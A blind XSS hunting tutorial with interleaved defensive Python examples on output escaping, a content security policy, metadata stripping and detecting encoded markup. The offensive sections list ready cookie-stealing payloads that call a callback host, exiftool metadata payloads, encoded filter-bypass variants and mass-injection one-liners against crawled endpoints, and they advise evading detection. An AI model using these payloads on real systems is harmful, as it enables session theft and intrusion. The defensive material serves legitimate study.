Mastering Blind XSS
Advanced techniques for stealthy cross-site scripting attacks
Blind XSS (BXSS) is a stealthy form of cross-site scripting where payloads are stored in places you can't see immediately, such as logs, admin panels, email templates, file metadata and other backend systems, and only execute later when those systems render the data. Because there's no instant feedback, it requires specialized tools and techniques.
Pro Tips
- Blind XSS payloads execute in contexts you can't see - admin panels, logs, email systems
- You need an external server to receive callbacks when payloads fire
- Patience is key - payloads may take hours, days, or weeks to execute
- Always use your own controlled server for testing
Before hunting for Blind XSS, you need the right toolset configured and ready.
Pro Tips
- Configure your Blind XSS Manager extension with your server address
- Use Burp Suite for Match & Replace rules and request inspection
- Arjun helps discover hidden parameters for bulk testing
The first step in any hunt is finding the right targets. Use custom dorks to locate various submission forms across the web that may be vulnerable to Blind XSS.
Pro Tips
- Focus on contact forms, feedback forms, and support ticket systems
- Admin panels and logging systems are prime targets
- Look for applications that store user input for later review
Before injecting payloads, you need a system to generate them and listen for their callbacks. This involves a Blind XSS server and a payload manager.
Pro Tips
- For sensitive testing, use a self-hosted solution you control
- Public services are convenient but may log your activity
- The extension helps manage multiple payloads across targets
Use Burp Suite's Match and Replace feature to automatically inject Blind XSS payloads into every request you make.
Commands
1. Navigate to Proxy > Settings > Match and Replace
2. Click 'Add' to create a new rule
3. Set the rule to replace User-Agent with your payload
Pro Tips
- User-Agent header is commonly logged by backend systems
- Apply the same logic to Referer, Origin, Cookie, Accept, Host, X-Forwarded-For headers
- Custom headers like X-Api-Version are often rendered without sanitization
These are example HTTP request headers with Blind XSS payloads. Replace YOUR-COLLAB.DOMAIN with your actual callback server.
Commands
User-Agent: <script src="https://YOUR-COLLAB.DOMAIN"></script>
Referer: https://YOUR-COLLAB.DOMAIN/?r=ref
X-Forwarded-For: 127.0.0.1, https://YOUR-COLLAB.DOMAIN/
X-Api-Version: <svg onload="new Image().src='https://YOUR-COLLAB.DOMAIN/?c='+document.cookie"></svg>
Cookie: session=abc; extra=<img src=x onerror="new Image().src='https://YOUR-COLLAB.DOMAIN/?c='+document.cookie">
Pro Tips
- Test multiple headers - you never know which one gets rendered
- Some applications log all headers for debugging purposes
- X-Api-Version and similar custom headers are often overlooked
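The reason header injection works is that a log viewer or admin panel drops the stored header text straight into its HTML. The following is an added example, not code from the original page: a minimal Python log-viewer renderer with the vulnerable row template beside the escaped one, plus the response headers a hardened admin panel would send. The log entries and the CALLBACK.example host are constructed placeholders.

```python
import html

# Constructed sample of per-request data a backend might log (not real
# traffic). CALLBACK.example is a placeholder, not a live collector.
SAMPLE_ENTRIES = [
    {"ip": "203.0.113.5", "path": "/login",
     "user_agent": "Mozilla/5.0 (X11; Linux x86_64)"},
    {"ip": "203.0.113.9", "path": "/contact",
     "user_agent": '<script src="https://CALLBACK.example"></script>'},
    {"ip": "203.0.113.9", "path": "/contact",
     "user_agent": "\" onmouseover=\"new Image().src='https://CALLBACK.example/?c='+document.cookie"},
]


def render_row_unsafe(entry):
    """The pattern that makes blind XSS work: the logged header is dropped
    straight into the admin page's HTML, so a stored <script> runs whenever
    an administrator opens the log viewer. Kept only to contrast with
    render_row_safe."""
    ua = entry["user_agent"]
    return (f"<tr><td>{entry['ip']}</td><td>{entry['path']}</td>"
            f'<td title="{ua}">{ua}</td></tr>')


def render_row_safe(entry):
    """Same row with escaping applied at the point of output. html.escape with
    quote=True rewrites <, >, &, double and single quotes, so the value is
    inert both as element text and inside the double-quoted title attribute."""
    def esc(value):
        return html.escape(str(value), quote=True)

    ua = esc(entry["user_agent"])
    return (f"<tr><td>{esc(entry['ip'])}</td><td>{esc(entry['path'])}</td>"
            f'<td title="{ua}">{ua}</td></tr>')


def render_table(entries, row_fn=render_row_safe):
    """Render the whole log view; the row function is the only place that
    decides whether logged text can become markup."""
    return "<table>" + "".join(row_fn(e) for e in entries) + "</table>"


# Defence in depth for the admin panel: if an escaping gap remains somewhere,
# this policy still stops the browser from fetching a script from an external
# callback host and from executing inline event handlers.
ADMIN_PANEL_HEADERS = {
    "Content-Security-Policy":
        "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'none'",
    "X-Content-Type-Options": "nosniff",
}


def attribute_is_intact(row):
    """Self-check: the title attribute must end exactly where the template
    closes it, i.e. the rendered value contains no raw double quote."""
    start = row.index('title="') + len('title="')
    end = row.index('">', start)
    return '"' not in row[start:end]


if __name__ == "__main__":
    for entry in SAMPLE_ENTRIES:
        print("unsafe:", render_row_unsafe(entry))
        print("safe:  ", render_row_safe(entry))
```

The escaping has to match the context: the same value sits in element text and in a quoted attribute here, and quote=True is what keeps the second payload from terminating the title attribute and adding its own onmouseover handler. The CSP is the backstop for the day someone adds a new column and forgets the escape.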
For manual testing, use a User-Agent switcher browser extension to quickly inject payloads while browsing.
Pro Tips
- Set your User-Agent to a payload and browse normally
- Every page you visit will have your payload in its logs
- Useful for passive hunting while doing other tasks
Use one-liner tools and scripts to scale your Blind XSS testing across many targets automatically.
Commands
arjun -u https://site.com/endpoint.php -oT arjun_output.txt -t 10 --rate-limit 10 --passive -m GET,POST --headers "User-Agent: Mozilla/5.0"
arjun -u https://site.com/endpoint.php -oT arjun_output.txt -m GET,POST -w /usr/share/wordlists/seclists/Discovery/Web-Content/burp-parameter-names.txt -t 10 --rate-limit 10 --headers "User-Agent: Mozilla/5.0"
subfinder -d vulnweb.com | gau | grep "&" | bxss -appendMode -payload '"><script src=https://xss.report/c/coffinxp></script>' -parameters
subfinder -d vulnweb.com | gau | bxss -payload '"><script src=https://xss.report/c/coffinxp></script>' -header "X-Forwarded-For"
Pro Tips
- Subfinder + GAU combination finds lots of endpoints quickly
- BXSS tool handles payload injection at scale
- Use rate limiting to avoid detection and blocking
A clever technique is embedding XSS payloads in image metadata. When the application displays the metadata, your payload executes.
Commands
exiftool -Comment='"><img src=x onerror=alert(1)>' test.jpg
exiftool -Title='"><script src=https://YOUR-COLLAB.DOMAIN></script>' test.jpg
exiftool -Subject='"><svg onload=alert(1)>' test.jpg
Pro Tips
- Windows: Right-click > Properties > Details to edit metadata
- Target fields: Title, Subject, Comments, Author, Tags
- Upload modified images to target applications
- Works when apps display image metadata without sanitization
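To see where a metadata payload actually lives and how an upload handler should treat it, here is an added example (not from the original page, and not exiftool's code): a small Python walker over JPEG marker segments that extracts the COM (comment) segment, escapes it for display, and re-emits the file with COM and APPn (EXIF/XMP) segments stripped, which is the usual mitigation for user uploads. The JPEG built here is a constructed minimal file with no image data; the comment string is the same kind of value the exiftool commands above write.

```python
import html
import struct

SOI, EOI = b"\xff\xd8", b"\xff\xd9"
COM, SOS = 0xFFFE, 0xFFDA


def build_jpeg(segments):
    """Constructed minimal JPEG: SOI, the given (marker, payload) segments,
    EOI. No scan data, which is enough to exercise metadata handling."""
    out = bytearray(SOI)
    for marker, payload in segments:
        out += struct.pack(">HH", marker, 2 + len(payload))  # length counts itself
        out += payload
    return bytes(out + EOI)


def build_jpeg_with_comment(comment: bytes) -> bytes:
    return build_jpeg([(COM, comment)])


def iter_segments(data: bytes):
    """Yield (marker, payload) for each header segment. Stops at EOI or at
    SOS, after which entropy-coded image data (no length fields) follows.
    Lengths are bounds-checked so a truncated file raises instead of
    reading past the end."""
    if data[:2] != SOI:
        raise ValueError("not a JPEG: missing SOI")
    pos = 2
    while pos + 2 <= len(data):
        (marker,) = struct.unpack(">H", data[pos:pos + 2])
        if marker == 0xFFD9:
            return
        if pos + 4 > len(data):
            raise ValueError("truncated segment header")
        (length,) = struct.unpack(">H", data[pos + 2:pos + 4])
        if length < 2 or pos + 2 + length > len(data):
            raise ValueError("truncated or malformed segment")
        yield marker, data[pos + 4:pos + 2 + length]
        if marker == SOS:
            return
        pos += 2 + length


def extract_comments(data: bytes):
    """The text a gallery page would show as 'Comment'."""
    return [p.decode("utf-8", errors="replace")
            for m, p in iter_segments(data) if m == COM]


def comment_for_html(comment: str) -> str:
    """What the page must emit: escaped, so a stored payload is displayed as
    text rather than parsed as markup."""
    return html.escape(comment, quote=True)


def strip_metadata(data: bytes) -> bytes:
    """Re-emit the file without COM and APPn (0xFFE0-0xFFEF) segments, where
    comments, EXIF and XMP live. Everything from SOS onward is copied as-is."""
    out = bytearray(SOI)
    pos = 2
    for marker, payload in iter_segments(data):
        seg_len = 4 + len(payload)
        if marker == SOS:
            out += data[pos:]
            return bytes(out)
        if not (marker == COM or 0xFFE0 <= marker <= 0xFFEF):
            out += data[pos:pos + seg_len]
        pos += seg_len
    return bytes(out + EOI)


# Constructed sample: the kind of comment `exiftool -Comment=...` would write.
SAMPLE_PAYLOAD = '"><img src=x onerror=alert(1)>'
SAMPLE_JPEG = build_jpeg_with_comment(SAMPLE_PAYLOAD.encode())

if __name__ == "__main__":
    for c in extract_comments(SAMPLE_JPEG):
        print("raw comment:    ", c)
        print("safe to render: ", comment_for_html(c))
    print("after strip:", extract_comments(strip_metadata(SAMPLE_JPEG)))
```

Stripping on upload and escaping on output are independent controls; an application that wants to keep EXIF for legitimate reasons still needs the second one, because the comment field is just untrusted text that happens to arrive inside a file.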
For highly-secured targets with strong input filtering, use encoded payloads. Create a single HTML file with dozens of payloads, each encoded differently (double URL encoding, triple URL encoding, HTML entities, etc.).
Commands
"><script src=https://YOUR-COLLAB.DOMAIN></script>
'"><img src=x onerror=this.src='https://YOUR-COLLAB.DOMAIN/?c='+document.cookie>
<svg/onload="fetch('https://YOUR-COLLAB.DOMAIN/?c='+document.cookie)">
javascript:eval(atob('BASE64_ENCODED_PAYLOAD'))
%22%3E%3Cscript%20src%3Dhttps%3A%2F%2FYOUR-COLLAB.DOMAIN%3E%3C%2Fscript%3E
%25%32%32%25%33%45%25%33%43%73%63%72%69%70%74...
Pro Tips
- Test multiple encoding variations against WAFs
- Maintain a payload file with various bypass techniques
- Different contexts require different encodings
- HTML entity encoding, Unicode, and mixed case can bypass filters
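Layered encodings get past filters that inspect the raw bytes but are decoded somewhere downstream. The following is an added example, not part of the original page: a Python canonicalizer that repeatedly URL-decodes and HTML-entity-decodes a value until it stops changing (with a bound against decode bombs), and a tripwire scanner that runs a few markup patterns over the canonical form of each request header. The header values are constructed samples. The scanner is meant to flag requests for review and alerting, not to act as a sanitizer; output escaping, as elsewhere on this page, remains the actual fix.

```python
import html
import re
from urllib.parse import unquote

MAX_DECODE_ROUNDS = 5


def canonicalize(value: str) -> str:
    """Undo stacked URL (%2522 -> %22 -> ") and HTML-entity (&lt; -> <)
    encoding until the string is stable. The round limit stops a value that
    is encoded dozens of times from costing unbounded work."""
    for _ in range(MAX_DECODE_ROUNDS):
        decoded = html.unescape(unquote(value))
        if decoded == value:
            return value
        value = decoded
    return value


# Patterns that indicate markup or script in a value expected to be plain
# text. Case-insensitive so ScRiPt and OnErRoR are not missed.
MARKUP_PATTERNS = {
    "script-tag": re.compile(r"<\s*script\b", re.I),
    "embedding-tag": re.compile(r"<\s*(?:svg|img|iframe|object|embed)\b", re.I),
    "event-handler": re.compile(r"\bon[a-z]+\s*=", re.I),
    "javascript-uri": re.compile(r"javascript\s*:", re.I),
}


def find_markup(value: str):
    """Names of the patterns that match the canonical form of value."""
    canon = canonicalize(value)
    return [name for name, pat in MARKUP_PATTERNS.items() if pat.search(canon)]


def scan_headers(headers: dict) -> dict:
    """Map each flagged header name to the pattern names it triggered; clean
    headers are omitted so an empty result means nothing to review."""
    findings = {}
    for name, value in headers.items():
        hits = find_markup(value)
        if hits:
            findings[name] = hits
    return findings


# Constructed request headers: one plain, one double-URL-encoded, one
# entity-encoded, one benign value that contains the letters "on".
SAMPLE_HEADERS = {
    "User-Agent": "%2522%253E%253Csvg%2520onload%253Dalert%25281%2529%253E",
    "Referer": "https://www.example.com/page?id=5",
    "X-Api-Version": "&lt;img src=x onerror=alert(1)&gt;",
    "Accept": "text/html,application/xhtml+xml",
}

if __name__ == "__main__":
    for name, value in SAMPLE_HEADERS.items():
        print(f"{name}: {canonicalize(value)!r} -> {find_markup(value)}")
```

Running the scanner on the canonical form is what makes the double-encoded User-Agent and the entity-encoded X-Api-Version show up as the same thing; the raw strings contain neither `<` nor `=` and would pass a naive filter.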
Conclusion
Blind XSS isn't for the impatient, but it's one of the most rewarding vulnerabilities. Be everywhere: automate payloads in headers with Burp or a User-Agent switcher, scale with one-liners that crawl targets, and never underestimate hidden payloads in image EXIF data. Every technique here is a tool to ensure no input goes untested. Build a robust methodology, think creatively, and let the backend do the work for you.
For educational and authorized testing purposes only. Always obtain proper authorization before testing.